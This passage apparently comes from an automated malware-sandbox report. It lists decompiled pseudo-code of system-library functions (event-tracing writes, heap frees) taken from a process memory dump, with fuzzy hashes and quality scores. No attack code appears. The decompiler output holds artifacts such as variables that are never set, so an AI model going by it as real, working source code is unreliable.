                                                                            • Opcode Fuzzy Hash: 6859d6f4c5e9977bc92457eb3a6b6fe49771edaf929abcbd9d7c2b2435c1fcb5
                                                                            • Instruction Fuzzy Hash: CE01F4B29156019FC36A8F08D880B55BBEAEF81324F218076F6419B692C370DC81CB90
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            C-Code - Quality: 86%
E01184015(signed int __eax, signed int __ecx) {
	void* __ebx;
	void* __edi;
	signed char _t10;
	signed int _t28;

	_push(__ecx);
	_t28 = __ecx;
	asm("lock xadd [edi+0x24], eax");
	_t10 = (__eax | 0xffffffff) - 1;
	if(_t10 == 0) {
		_t1 = _t28 + 0x1c; // 0x1e
		E010D2280(_t10, _t1);
		 *((intOrPtr*)(_t28 + 0x20)) =  *((intOrPtr*)( *[fs:0x18] + 0x24));
		E010D2280( *((intOrPtr*)( *[fs:0x18] + 0x24)), 0x11a86ac);
		E010BF900(0x11a86d4, _t28);
		E010CFFB0(0x11a86ac, _t28, 0x11a86ac);
		 *((intOrPtr*)(_t28 + 0x20)) = 0;
		E010CFFB0(0, _t28, _t1);
		_t18 =  *((intOrPtr*)(_t28 + 0x94));
		if( *((intOrPtr*)(_t28 + 0x94)) != 0) {
			L010D77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t18);
		}
		_t10 = L010D77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t28);
	}
	return _t10;
}


                                                                            Memory Dump Source
                                                                            • Source File: 00000007.00000002.431895003.0000000001090000.00000040.00000001.sdmp, Offset: 01090000, based on PE: true
                                                                            • Associated: 00000007.00000002.432566539.00000000011AB000.00000040.00000001.sdmp
                                                                            • Associated: 00000007.00000002.432597012.00000000011AF000.00000040.00000001.sdmp
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID:
                                                                            • API String ID:
                                                                            • Opcode ID: 7531a9ef69ec7396c4d3581853d4a952f290b9d572c49829597145998b30e48c
                                                                            • Instruction ID: a15026948c785c52ee7f5a6b5077910165e8e9144185b83b56819228aa599541
                                                                            • Opcode Fuzzy Hash: 7531a9ef69ec7396c4d3581853d4a952f290b9d572c49829597145998b30e48c
                                                                            • Instruction Fuzzy Hash: 4C01A272201A477FD215BF79CD80E97FBACFF55660B000229F54883A11CB24EC12CAE4
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            C-Code - Quality: 61%
E011714FB(intOrPtr __ebx, intOrPtr __ecx, intOrPtr __edx, intOrPtr _a4, intOrPtr _a8) {
	signed int _v8;
	intOrPtr _v16;
	intOrPtr _v20;
	intOrPtr _v24;
	intOrPtr _v28;
	short _v54;
	char _v60;
	void* __edi;
	void* __esi;
	signed char* _t21;
	intOrPtr _t27;
	intOrPtr _t33;
	intOrPtr _t34;
	signed int _t35;

	_t32 = __edx;
	_t27 = __ebx;
	_v8 =  *0x11ad360 ^ _t35;
	_t33 = __edx;
	_t34 = __ecx;
	E010FFA60( &_v60, 0, 0x30);
	_v20 = _a4;
	_v16 = _a8;
	_v28 = _t34;
	_v24 = _t33;
	_v54 = 0x1034;
	if(E010D7D50() == 0) {
		_t21 = 0x7ffe0388;
	} else {
		_t21 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22e;
	}
	_push( &_v60);
	_push(0x10);
	_push(0x20402);
	_push( *_t21 & 0x000000ff);
	return E010FB640(E010F9AE0(), _t27, _v8 ^ _t35, _t32, _t33, _t34);
}


                                                                            Memory Dump Source
                                                                            • Source File: 00000007.00000002.431895003.0000000001090000.00000040.00000001.sdmp, Offset: 01090000, based on PE: true
                                                                            • Associated: 00000007.00000002.432566539.00000000011AB000.00000040.00000001.sdmp
                                                                            • Associated: 00000007.00000002.432597012.00000000011AF000.00000040.00000001.sdmp
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID:
                                                                            • API String ID:
                                                                            • Opcode ID: ad42ea8057e32403757c5b284ec83fb14dd5c9cb20e519b352f643d41e0c37ad
                                                                            • Instruction ID: ca548ed3003bec0e9ddd866fae4e94cf5817d157d567381a2adabd87b2925e27
                                                                            • Opcode Fuzzy Hash: ad42ea8057e32403757c5b284ec83fb14dd5c9cb20e519b352f643d41e0c37ad
                                                                            • Instruction Fuzzy Hash: 2801B571A00249AFCB14EFA9D842FEEBBB8EF45700F44406AF914EB380D674DA00CB94
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            C-Code - Quality: 61%
E0117138A(intOrPtr __ebx, intOrPtr __ecx, intOrPtr __edx, intOrPtr _a4, intOrPtr _a8) {
	signed int _v8;
	intOrPtr _v16;
	intOrPtr _v20;
	intOrPtr _v24;
	intOrPtr _v28;
	short _v54;
	char _v60;
	void* __edi;
	void* __esi;
	signed char* _t21;
	intOrPtr _t27;
	intOrPtr _t33;
	intOrPtr _t34;
	signed int _t35;

	_t32 = __edx;
	_t27 = __ebx;
	_v8 =  *0x11ad360 ^ _t35;
	_t33 = __edx;
	_t34 = __ecx;
	E010FFA60( &_v60, 0, 0x30);
	_v20 = _a4;
	_v16 = _a8;
	_v28 = _t34;
	_v24 = _t33;
	_v54 = 0x1033;
	if(E010D7D50() == 0) {
		_t21 = 0x7ffe0388;
	} else {
		_t21 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22e;
	}
	_push( &_v60);
	_push(0x10);
	_push(0x20402);
	_push( *_t21 & 0x000000ff);
	return E010FB640(E010F9AE0(), _t27, _v8 ^ _t35, _t32, _t33, _t34);
}


                                                                            Memory Dump Source
                                                                            • Source File: 00000007.00000002.431895003.0000000001090000.00000040.00000001.sdmp, Offset: 01090000, based on PE: true
                                                                            • Associated: 00000007.00000002.432566539.00000000011AB000.00000040.00000001.sdmp
                                                                            • Associated: 00000007.00000002.432597012.00000000011AF000.00000040.00000001.sdmp
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            C-Code - Quality: 91%
                                                                            E010B58EC(intOrPtr __ecx) {
                                                                                signed int _v8;
                                                                                char _v28;
                                                                                char _v44;
                                                                                char _v76;
                                                                                void* __edi;
                                                                                void* __esi;
                                                                                intOrPtr _t10;
                                                                                intOrPtr _t16;
                                                                                intOrPtr _t17;
                                                                                intOrPtr _t27;
                                                                                intOrPtr _t28;
                                                                                signed int _t29;

                                                                                _v8 = *0x11ad360 ^ _t29;
                                                                                _t10 = *[fs:0x30];
                                                                                _t27 = __ecx;
                                                                                if(_t10 == 0) {
                                                                                    L6:
                                                                                    _t28 = 0x1095c80;
                                                                                } else {
                                                                                    _t16 = *((intOrPtr*)(_t10 + 0x10));
                                                                                    if(_t16 == 0) {
                                                                                        goto L6;
                                                                                    } else {
                                                                                        _t28 = *((intOrPtr*)(_t16 + 0x3c));
                                                                                    }
                                                                                }
                                                                                if(E010B5943() != 0 && *0x11a5320 > 5) {
                                                                                    E01137B5E( &_v44, _t27);
                                                                                    _t22 = &_v28;
                                                                                    E01137B5E( &_v28, _t28);
                                                                                    _t11 = E01137B9C(0x11a5320, 0x109bf15, &_v28, _t22, 4, &_v76);
                                                                                }
                                                                                return E010FB640(_t11, _t17, _v8 ^ _t29, 0x109bf15, _t27, _t28);
                                                                            }


                                                                            Memory Dump Source
                                                                            • Source File: 00000007.00000002.431895003.0000000001090000.00000040.00000001.sdmp, Offset: 01090000, based on PE: true
                                                                            • Associated: 00000007.00000002.432566539.00000000011AB000.00000040.00000001.sdmp
                                                                            • Associated: 00000007.00000002.432597012.00000000011AF000.00000040.00000001.sdmp
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            C-Code - Quality: 100%
                                                                            E010CB02A(intOrPtr __ecx, signed short* __edx, short _a4) {
                                                                                signed char _t11;
                                                                                signed char* _t12;
                                                                                intOrPtr _t24;
                                                                                signed short* _t25;

                                                                                _t25 = __edx;
                                                                                _t24 = __ecx;
                                                                                _t11 = ( *[fs:0x30])[0x50];
                                                                                if(_t11 != 0) {
                                                                                    if( *_t11 == 0) {
                                                                                        goto L1;
                                                                                    }
                                                                                    _t12 = ( *[fs:0x30])[0x50] + 0x22a;
                                                                                    L2:
                                                                                    if( *_t12 != 0) {
                                                                                        _t12 = *[fs:0x30];
                                                                                        if((_t12[0x240] & 0x00000004) == 0) {
                                                                                            goto L3;
                                                                                        }
                                                                                        if(E010D7D50() == 0) {
                                                                                            _t12 = 0x7ffe0385;
                                                                                        } else {
                                                                                            _t12 = ( *[fs:0x30])[0x50] + 0x22b;
                                                                                        }
                                                                                        if(( *_t12 & 0x00000020) == 0) {
                                                                                            goto L3;
                                                                                        }
                                                                                        return E01137016(_a4, _t24, 0, 0, _t25, 0);
                                                                                    }
                                                                                    L3:
                                                                                    return _t12;
                                                                                }
                                                                                L1:
                                                                                _t12 = 0x7ffe0384;
                                                                                goto L2;
                                                                            }


                                                                            Memory Dump Source
                                                                            • Source File: 00000007.00000002.431895003.0000000001090000.00000040.00000001.sdmp, Offset: 01090000, based on PE: true
                                                                            • Associated: 00000007.00000002.432566539.00000000011AB000.00000040.00000001.sdmp
                                                                            • Associated: 00000007.00000002.432597012.00000000011AF000.00000040.00000001.sdmp
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            C-Code - Quality: 100%
                                                                            E01181074(void* __ebx, signed int* __ecx, char __edx, void* __edi, intOrPtr _a4) {
                                                                                char _v8;
                                                                                void* _v11;
                                                                                unsigned int _v12;
                                                                                void* _v15;
                                                                                void* __esi;
                                                                                void* __ebp;
                                                                                char* _t16;
                                                                                signed int* _t35;

                                                                                _t22 = __ebx;
                                                                                _t35 = __ecx;
                                                                                _v8 = __edx;
                                                                                _t13 = !( *__ecx) + 1;
                                                                                _v12 = !( *__ecx) + 1;
                                                                                if(_a4 != 0) {
                                                                                    E0118165E(__ebx, 0x11a8ae4, (__edx - *0x11a8b04 >> 0x14) + (__edx - *0x11a8b04 >> 0x14), __edi, __ecx, (__edx - *0x11a8b04 >> 0x14) + (__edx - *0x11a8b04 >> 0x14), (_t13 >> 0x14) + (_t13 >> 0x14));
                                                                                }
                                                                                E0117AFDE( &_v8, &_v12, 0x8000, *((intOrPtr*)(_t35 + 0x34)), *((intOrPtr*)(_t35 + 0x38)));
                                                                                if(E010D7D50() == 0) {
                                                                                    _t16 = 0x7ffe0388;
                                                                                } else {
                                                                                    _t16 = *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22e;
                                                                                }
                                                                                if( *_t16 != 0) {
                                                                                    _t16 = E0116FE3F(_t22, _t35, _v8, _v12);
                                                                                }
                                                                                return _t16;
                                                                            }


                                                                            Memory Dump Source
                                                                            • Source File: 00000007.00000002.431895003.0000000001090000.00000040.00000001.sdmp, Offset: 01090000, based on PE: true
                                                                            • Associated: 00000007.00000002.432566539.00000000011AB000.00000040.00000001.sdmp
                                                                            • Associated: 00000007.00000002.432597012.00000000011AF000.00000040.00000001.sdmp
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            C-Code - Quality: 59%
                                                                            E0116FE3F(intOrPtr __ebx, intOrPtr __ecx, intOrPtr __edx, intOrPtr _a4) {
                                                                                signed int _v12;
                                                                                intOrPtr _v24;
                                                                                intOrPtr _v28;
                                                                                intOrPtr _v32;
                                                                                short _v58;
                                                                                char _v64;
                                                                                void* __edi;
                                                                                void* __esi;
                                                                                signed char* _t18;
                                                                                intOrPtr _t24;
                                                                                intOrPtr _t30;
                                                                                intOrPtr _t31;
                                                                                signed int _t32;

                                                                                _t29 = __edx;
                                                                                _t24 = __ebx;
                                                                                _v12 = *0x11ad360 ^ _t32;
                                                                                _t30 = __edx;
                                                                                _t31 = __ecx;
                                                                                E010FFA60( &_v64, 0, 0x30);
                                                                                _v24 = _a4;
                                                                                _v32 = _t31;
                                                                                _v28 = _t30;
                                                                                _v58 = 0x267;
                                                                                if(E010D7D50() == 0) {
                                                                                    _t18 = 0x7ffe0388;
                                                                                } else {
                                                                                    _t18 = *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22e;
                                                                                }
                                                                                _push( &_v64);
                                                                                _push(0x10);
                                                                                _push(0x20402);
                                                                                _push( *_t18 & 0x000000ff);
                                                                                return E010FB640(E010F9AE0(), _t24, _v12 ^ _t32, _t29, _t30, _t31);
                                                                            }


                                                                            Memory Dump Source
                                                                            • Source File: 00000007.00000002.431895003.0000000001090000.00000040.00000001.sdmp, Offset: 01090000, based on PE: true
                                                                            • Associated: 00000007.00000002.432566539.00000000011AB000.00000040.00000001.sdmp
                                                                            • Associated: 00000007.00000002.432597012.00000000011AF000.00000040.00000001.sdmp
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            C-Code - Quality: 59%
                                                                            E0116FEC0(intOrPtr __ebx, intOrPtr __ecx, intOrPtr __edx, intOrPtr _a4) {
                                                                                signed int _v12;
                                                                                intOrPtr _v24;
                                                                                intOrPtr _v28;
                                                                                intOrPtr _v32;
                                                                                short _v58;
                                                                                char _v64;
                                                                                void* __edi;
                                                                                void* __esi;
                                                                                signed char* _t18;
                                                                                intOrPtr _t24;
                                                                                intOrPtr _t30;
                                                                                intOrPtr _t31;
                                                                                signed int _t32;

                                                                                _t29 = __edx;
                                                                                _t24 = __ebx;
                                                                                _v12 = *0x11ad360 ^ _t32;
                                                                                _t30 = __edx;
                                                                                _t31 = __ecx;
                                                                                E010FFA60( &_v64, 0, 0x30);
                                                                                _v24 = _a4;
                                                                                _v32 = _t31;
                                                                                _v28 = _t30;
                                                                                _v58 = 0x266;
                                                                                if(E010D7D50() == 0) {
                                                                                    _t18 = 0x7ffe0388;
                                                                                } else {
                                                                                    _t18 = *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22e;
                                                                                }
                                                                                _push( &_v64);
                                                                                _push(0x10);
                                                                                _push(0x20402);
                                                                                _push( *_t18 & 0x000000ff);
                                                                                return E010FB640(E010F9AE0(), _t24, _v12 ^ _t32, _t29, _t30, _t31);
                                                                            }


                                                                            Memory Dump Source
                                                                            • Source File: 00000007.00000002.431895003.0000000001090000.00000040.00000001.sdmp, Offset: 01090000, based on PE: true
                                                                            • Associated: 00000007.00000002.432566539.00000000011AB000.00000040.00000001.sdmp
                                                                            • Associated: 00000007.00000002.432597012.00000000011AF000.00000040.00000001.sdmp
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            C-Code - Quality: 54%
                                                                            E01188A62(intOrPtr __ecx, intOrPtr __edx, intOrPtr _a4, intOrPtr _a8, intOrPtr _a12) {
                                                                                signed int _v12;
                                                                                intOrPtr _v24;
                                                                                intOrPtr _v28;
                                                                                intOrPtr _v32;
                                                                                intOrPtr _v36;
                                                                                intOrPtr _v40;
                                                                                short _v66;
                                                                                char _v72;
                                                                                void* __ebx;
                                                                                void* __edi;
                                                                                void* __esi;
                                                                                signed char* _t18;
                                                                                signed int _t32;

                                                                                _t29 = __edx;
                                                                                _v12 = *0x11ad360 ^ _t32;
                                                                                _t31 = _a8;
                                                                                _t30 = _a12;
                                                                                _v66 = 0x1c20;
                                                                                _v40 = __ecx;
                                                                                _v36 = __edx;
                                                                                _v32 = _a4;
                                                                                _v28 = _a8;
                                                                                _v24 = _a12;
                                                                                if(E010D7D50() == 0) {
                                                                                    _t18 = 0x7ffe0386;
                                                                                } else {
                                                                                    _t18 = *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22c;
                                                                                }
                                                                                _push( &_v72);
                                                                                _push(0x14);
                                                                                _push(0x20402);
                                                                                _push( *_t18 & 0x000000ff);
                                                                                return E010FB640(E010F9AE0(), 0x1c20, _v12 ^ _t32, _t29, _t30, _t31);
                                                                            }


                                                                            Memory Dump Source
                                                                            • Source File: 00000007.00000002.431895003.0000000001090000.00000040.00000001.sdmp, Offset: 01090000, based on PE: true
                                                                            • Associated: 00000007.00000002.432566539.00000000011AB000.00000040.00000001.sdmp
                                                                            • Associated: 00000007.00000002.432597012.00000000011AF000.00000040.00000001.sdmp
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            C-Code - Quality: 54%
E01188ED6(intOrPtr __ecx, intOrPtr __edx) {
    signed int _v8;
    signed int _v12;
    intOrPtr _v16;
    intOrPtr _v20;
    intOrPtr _v24;
    intOrPtr _v28;
    intOrPtr _v32;
    intOrPtr _v36;
    short _v62;
    char _v68;
    signed char* _t29;
    intOrPtr _t35;
    intOrPtr _t41;
    intOrPtr _t42;
    signed int _t43;

    _t40 = __edx;
    _v8 = *0x11ad360 ^ _t43;
    _v28 = __ecx;
    _v62 = 0x1c2a;
    _v36 = *((intOrPtr*)(__edx + 0xc8));
    _v32 = *((intOrPtr*)(__edx + 0xcc));
    _v20 = *((intOrPtr*)(__edx + 0xd8));
    _v16 = *((intOrPtr*)(__edx + 0xd4));
    _v24 = __edx;
    _v12 = ( *(__edx + 0xde) & 0x000000ff) >> 0x00000001 & 0x00000001;
    if(E010D7D50() == 0) {
        _t29 = 0x7ffe0386;
    } else {
        _t29 = *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22c;
    }
    _push( &_v68);
    _push(0x1c);
    _push(0x20402);
    _push( *_t29 & 0x000000ff);
    return E010FB640(E010F9AE0(), _t35, _v8 ^ _t43, _t40, _t41, _t42);
}


                                                                            Memory Dump Source
                                                                            • Source File: 00000007.00000002.431895003.0000000001090000.00000040.00000001.sdmp, Offset: 01090000, based on PE: true
                                                                            • Associated: 00000007.00000002.432566539.00000000011AB000.00000040.00000001.sdmp
                                                                            • Associated: 00000007.00000002.432597012.00000000011AF000.00000040.00000001.sdmp
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID:
                                                                            • API String ID:
                                                                            • Opcode ID: 4b37512edd44e786b9443d1e2a23b60f63f57433eb97b7100d54061419d4dde5
                                                                            • Instruction ID: 1bd6073916fa68365836bd13dec79bde8f052c07df0f84896c01a66e4bf7229d
                                                                            • Opcode Fuzzy Hash: 4b37512edd44e786b9443d1e2a23b60f63f57433eb97b7100d54061419d4dde5
                                                                            • Instruction Fuzzy Hash: 8A111E70A0020A9FDB04EFA9D441BAEBBF4FF08300F4442AAE518EB781E6349940CB91
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            C-Code - Quality: 100%
E010BDB60(signed int __ecx) {
    intOrPtr* _t9;
    void* _t12;
    void* _t13;
    intOrPtr _t14;

    _t9 = __ecx;
    _t14 = 0;
    if(__ecx == 0 || *((intOrPtr*)(__ecx)) != 0) {
        _t13 = 0xc000000d;
    } else {
        _t14 = E010BDB40();
        if(_t14 == 0) {
            _t13 = 0xc0000017;
        } else {
            _t13 = E010BE7B0(__ecx, _t12, _t14, 0xfff);
            if(_t13 < 0) {
                L010BE8B0(__ecx, _t14, 0xfff);
                L010D77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t14);
                _t14 = 0;
            } else {
                _t13 = 0;
                *((intOrPtr*)(_t14 + 0xc)) = *0x7ffe03a4;
            }
        }
    }
    *_t9 = _t14;
    return _t13;
}


                                                                            Memory Dump Source
                                                                            • Source File: 00000007.00000002.431895003.0000000001090000.00000040.00000001.sdmp, Offset: 01090000, based on PE: true
                                                                            • Associated: 00000007.00000002.432566539.00000000011AB000.00000040.00000001.sdmp
                                                                            • Associated: 00000007.00000002.432597012.00000000011AF000.00000040.00000001.sdmp
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID:
                                                                            • API String ID:
                                                                            • Opcode ID: 4108fb18439822e7528065d03744c5b66e5752e741267b0d2dbc6e7ad13d6de1
                                                                            • Instruction ID: e71f80c197610f2cb92926123180f9c55e404c25d266bc358025bac5669901b6
                                                                            • Opcode Fuzzy Hash: 4108fb18439822e7528065d03744c5b66e5752e741267b0d2dbc6e7ad13d6de1
                                                                            • Instruction Fuzzy Hash: EAF0C233241A23DBD7326AE988D0FEBFA959F91B64F160035F2859B344CE64880287E5
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            C-Code - Quality: 100%
E010BB1E1(intOrPtr __ecx, char __edx, char _a4, signed short* _a8) {
    signed char* _t13;
    intOrPtr _t22;
    char _t23;

    _t23 = __edx;
    _t22 = __ecx;
    if(E010D7D50() != 0) {
        _t13 = ( *[fs:0x30])[0x50] + 0x22a;
    } else {
        _t13 = 0x7ffe0384;
    }
    if( *_t13 != 0) {
        _t13 = *[fs:0x30];
        if((_t13[0x240] & 0x00000004) == 0) {
            goto L3;
        }
        if(E010D7D50() == 0) {
            _t13 = 0x7ffe0385;
        } else {
            _t13 = ( *[fs:0x30])[0x50] + 0x22b;
        }
        if(( *_t13 & 0x00000020) == 0) {
            goto L3;
        }
        return E01137016(0x14a4, _t22, _t23, _a4, _a8, 0);
    } else {
        L3:
        return _t13;
    }
}


                                                                            Memory Dump Source
                                                                            • Source File: 00000007.00000002.431895003.0000000001090000.00000040.00000001.sdmp, Offset: 01090000, based on PE: true
                                                                            • Associated: 00000007.00000002.432566539.00000000011AB000.00000040.00000001.sdmp
                                                                            • Associated: 00000007.00000002.432597012.00000000011AF000.00000040.00000001.sdmp
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID:
                                                                            • API String ID:
                                                                            • Opcode ID: d7c926d8f7ad5fed70f9c3145ab0d11368f8906714783f3796a50782a1b3489b
                                                                            • Instruction ID: 4776af5d194441824eadf0aaa75e79685b2abbd4e726c1673d11db526659b40e
                                                                            • Opcode Fuzzy Hash: d7c926d8f7ad5fed70f9c3145ab0d11368f8906714783f3796a50782a1b3489b
                                                                            • Instruction Fuzzy Hash: C201F4336006809BD326A75DD844FA9BBD8EF92B54F0A00B1FA558BAB6D778C800C315
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            C-Code - Quality: 46%
E0114FE87(intOrPtr __ecx) {
    signed int _v8;
    intOrPtr _v16;
    intOrPtr _v20;
    signed int _v24;
    intOrPtr _v28;
    short _v54;
    char _v60;
    signed char* _t21;
    intOrPtr _t27;
    intOrPtr _t32;
    intOrPtr _t33;
    intOrPtr _t34;
    signed int _t35;

    _v8 = *0x11ad360 ^ _t35;
    _v16 = __ecx;
    _v54 = 0x1722;
    _v24 = *(__ecx + 0x14) & 0x00ffffff;
    _v28 = *((intOrPtr*)(__ecx + 4));
    _v20 = *((intOrPtr*)(__ecx + 0xc));
    if(E010D7D50() == 0) {
        _t21 = 0x7ffe0382;
    } else {
        _t21 = *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x228;
    }
    _push( &_v60);
    _push(0x10);
    _push(0x20402);
    _push( *_t21 & 0x000000ff);
    return E010FB640(E010F9AE0(), _t27, _v8 ^ _t35, _t32, _t33, _t34);
}


                                                                            Memory Dump Source
                                                                            • Source File: 00000007.00000002.431895003.0000000001090000.00000040.00000001.sdmp, Offset: 01090000, based on PE: true
                                                                            • Associated: 00000007.00000002.432566539.00000000011AB000.00000040.00000001.sdmp
                                                                            • Associated: 00000007.00000002.432597012.00000000011AF000.00000040.00000001.sdmp
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID:
                                                                            • API String ID:
                                                                            • Opcode ID: 7d87e973599ec974d5bb572f514ca5e2d3c905df74cf187d8124a245cda145c4
                                                                            • Instruction ID: 1d663b867ef8dbe2388e96f859f373904b941d7aff998471c9f260e4d55aa251
                                                                            • Opcode Fuzzy Hash: 7d87e973599ec974d5bb572f514ca5e2d3c905df74cf187d8124a245cda145c4
                                                                            • Instruction Fuzzy Hash: 87016270A00209EFCB14DFACD542AAEBBF4EF08704F504169B554EB382D635D902CB81
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            C-Code - Quality: 48%
E0117131B(intOrPtr __ecx, intOrPtr __edx, intOrPtr _a4, intOrPtr _a8) {
    signed int _v8;
    intOrPtr _v12;
    intOrPtr _v16;
    intOrPtr _v20;
    intOrPtr _v24;
    short _v50;
    char _v56;
    signed char* _t18;
    intOrPtr _t24;
    intOrPtr _t30;
    intOrPtr _t31;
    signed int _t32;

    _t29 = __edx;
    _v8 = *0x11ad360 ^ _t32;
    _v20 = _a4;
    _v12 = _a8;
    _v24 = __ecx;
    _v16 = __edx;
    _v50 = 0x1021;
    if(E010D7D50() == 0) {
        _t18 = 0x7ffe0380;
    } else {
        _t18 = *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x226;
    }
    _push( &_v56);
    _push(0x10);
    _push(0x20402);
    _push( *_t18 & 0x000000ff);
    return E010FB640(E010F9AE0(), _t24, _v8 ^ _t32, _t29, _t30, _t31);
}


                                                                            Memory Dump Source
                                                                            • Source File: 00000007.00000002.431895003.0000000001090000.00000040.00000001.sdmp, Offset: 01090000, based on PE: true
                                                                            • Associated: 00000007.00000002.432566539.00000000011AB000.00000040.00000001.sdmp
                                                                            • Associated: 00000007.00000002.432597012.00000000011AF000.00000040.00000001.sdmp
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID:
                                                                            • API String ID:
                                                                            • Opcode ID: 6a817f5f36234182370c6f2affeec42823c98e2d9683fd82b6a9f3ceb460c5b9
                                                                            • Instruction ID: 0989cf8c8ed571466c8932089cb0c303aae1f778c024d1f52b4330e199e98fed
                                                                            • Opcode Fuzzy Hash: 6a817f5f36234182370c6f2affeec42823c98e2d9683fd82b6a9f3ceb460c5b9
                                                                            • Instruction Fuzzy Hash: 89014F71A0520DAFCB04EFA9D545AAEBBF4FF18700F404069F945EB781E634DA00CB94
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            C-Code - Quality: 48%
E01188F6A(intOrPtr __ecx, intOrPtr __edx, intOrPtr _a4, intOrPtr _a8) {
    signed int _v8;
    intOrPtr _v12;
    intOrPtr _v16;
    intOrPtr _v20;
    intOrPtr _v24;
    short _v50;
    char _v56;
    signed char* _t18;
    intOrPtr _t24;
    intOrPtr _t30;
    intOrPtr _t31;
    signed int _t32;

    _t29 = __edx;
    _v8 = *0x11ad360 ^ _t32;
    _v16 = __ecx;
    _v50 = 0x1c2c;
    _v24 = _a4;
    _v20 = _a8;
    _v12 = __edx;
    if(E010D7D50() == 0) {
        _t18 = 0x7ffe0386;
    } else {
        _t18 = *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22c;
    }
    _push( &_v56);
    _push(0x10);
    _push(0x402);
    _push( *_t18 & 0x000000ff);
    return E010FB640(E010F9AE0(), _t24, _v8 ^ _t32, _t29, _t30, _t31);
}


                                                                            Memory Dump Source
                                                                            • Source File: 00000007.00000002.431895003.0000000001090000.00000040.00000001.sdmp, Offset: 01090000, based on PE: true
                                                                            • Associated: 00000007.00000002.432566539.00000000011AB000.00000040.00000001.sdmp
                                                                            • Associated: 00000007.00000002.432597012.00000000011AF000.00000040.00000001.sdmp
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID:
                                                                            • API String ID:
                                                                            • Opcode ID: b6573e2181e82e46005dd6831894b184aa4f086d719f6a27433e7e4ba87b3d0a
                                                                            • Instruction ID: a69e142970b3403c012d4db0b1d239913e2e3208e940ef03e681648d8efc7acf
                                                                            • Opcode Fuzzy Hash: b6573e2181e82e46005dd6831894b184aa4f086d719f6a27433e7e4ba87b3d0a
                                                                            • Instruction Fuzzy Hash: 67014474A0020DAFDB04EFA8D545AAEB7F4EF18300F508059B945EB380DB34DA00CF95
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            C-Code - Quality: 46%
E01171608(intOrPtr __ecx, intOrPtr __edx, intOrPtr _a4) {
    signed int _v8;
    intOrPtr _v12;
    intOrPtr _v16;
    intOrPtr _v20;
    short _v46;
    char _v52;
    signed char* _t15;
    intOrPtr _t21;
    intOrPtr _t27;
    intOrPtr _t28;
    signed int _t29;

    _t26 = __edx;
    _v8 = *0x11ad360 ^ _t29;
    _v12 = _a4;
    _v20 = __ecx;
    _v16 = __edx;
    _v46 = 0x1024;
    if(E010D7D50() == 0) {
        _t15 = 0x7ffe0380;
    } else {
        _t15 = *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x226;
    }
    _push( &_v52);
    _push(0xc);
    _push(0x20402);
    _push( *_t15 & 0x000000ff);
    return E010FB640(E010F9AE0(), _t21, _v8 ^ _t29, _t26, _t27, _t28);
}


                                                                            Memory Dump Source
                                                                            • Source File: 00000007.00000002.431895003.0000000001090000.00000040.00000001.sdmp, Offset: 01090000, based on PE: true
                                                                            • Associated: 00000007.00000002.432566539.00000000011AB000.00000040.00000001.sdmp
                                                                            • Associated: 00000007.00000002.432597012.00000000011AF000.00000040.00000001.sdmp
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID:
                                                                            • API String ID:
                                                                            • Opcode ID: 2b457b3cfb227fb87c86552d1f297ed2d0affe5972fd7eed0d5312d9d73723c9
                                                                            • Instruction ID: fbb2f517c413feb49eaa248c03983160607d45b6f253f9e36b37a8a5a54897fb
                                                                            • Opcode Fuzzy Hash: 2b457b3cfb227fb87c86552d1f297ed2d0affe5972fd7eed0d5312d9d73723c9
                                                                            • Instruction Fuzzy Hash: 1DF06271A04248EFDB14EFA9D406AAEBBF4EF18300F444069BA55EB381E674DA00CB94
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            C-Code - Quality: 100%
E010DC577(void* __ecx, char _a4) {
    void* __esi;
    void* __ebp;
    void* _t17;
    void* _t19;
    void* _t20;
    void* _t21;

    _t18 = __ecx;
    _t21 = __ecx;
    if(__ecx == 0 || *((char*)(__ecx + 0xdd)) != 0 || E010DC5D5(__ecx, _t19) == 0 || *((intOrPtr*)(__ecx + 4)) != 0x10911cc || *((char*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0x28)) != 0) {
        __eflags = _a4;
        if(__eflags != 0) {
            L10:
            E011888F5(_t17, _t18, _t19, _t20, _t21, __eflags);
            L9:
            return 0;
        }
